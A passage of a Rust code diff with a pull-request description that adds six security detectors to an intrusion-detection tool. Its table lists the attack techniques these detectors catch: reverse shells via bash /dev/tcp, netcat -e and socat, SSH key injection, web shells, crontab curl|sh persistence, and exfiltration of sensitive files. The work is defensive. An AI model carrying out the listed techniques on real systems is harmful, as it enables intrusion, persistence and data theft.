+            write_incident(writer, stats, incident);
+        }
+    }
+
+    if let Some(ref mut det) = detectors.data_exfiltration {
         if let Some(incident) = det.process(&ev) {
             write_incident(writer, stats, incident);
         }


### PR DESCRIPTION
## Summary
6 new detectors in a single PR:

| Detector | What it catches | Severity | Tests |
|----------|----------------|----------|-------|
| **Reverse shell** | bash /dev/tcp, netcat -e, python socket, perl, ruby, php, mkfifo, socat | Critical | 16 |
| **SSH key injection** | authorized_keys write, sshd_config modification by non-root | Critical/High | 12 |
| **Web shell** | PHP/JSP/ASP/CGI created in /var/www, /usr/share/nginx, etc | Critical | 15 |
| **Kernel module loading** | insmod/modprobe non-standard modules, critical from /tmp | High/Critical | 10 |
| **Crontab persistence** | Real-time crontab modification, curl\|sh patterns | High/Critical | 12 |
| **Data exfiltration** | Sensitive file read + outbound connection within 60s | High | 12 |

77 new tests, 842 total passing.

## Test plan
- [x] cargo test --workspace (842 passed)
- [x] cargo clippy clean
- [x] cargo fmt clean